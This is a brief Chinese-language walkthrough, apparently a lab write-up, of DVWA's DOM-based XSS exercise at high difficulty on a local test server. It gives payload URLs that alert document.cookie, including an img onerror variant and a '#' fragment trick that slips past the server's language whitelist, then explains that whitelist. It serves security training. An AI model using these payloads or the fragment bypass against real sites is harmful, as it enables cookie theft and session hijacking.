随便选择一个。url中会出现我们选的哪个
http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E
应该与medium级别一样,过滤了script标签
试试 <img src=1 onerror=alert(document.cookie)>
http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cimg%20src=1%20onerror=alert(document.cookie)%3E
再换一种方法
URL的锚(#符号之后的任何内容)不会发送到服务器,因此无法被阻止
http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(document.cookie)%3C/script%3E
成功执行
代码分析
可以看出,服务器端代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。白名单只允许传的 default值 为 French English German Spanish 其中一个。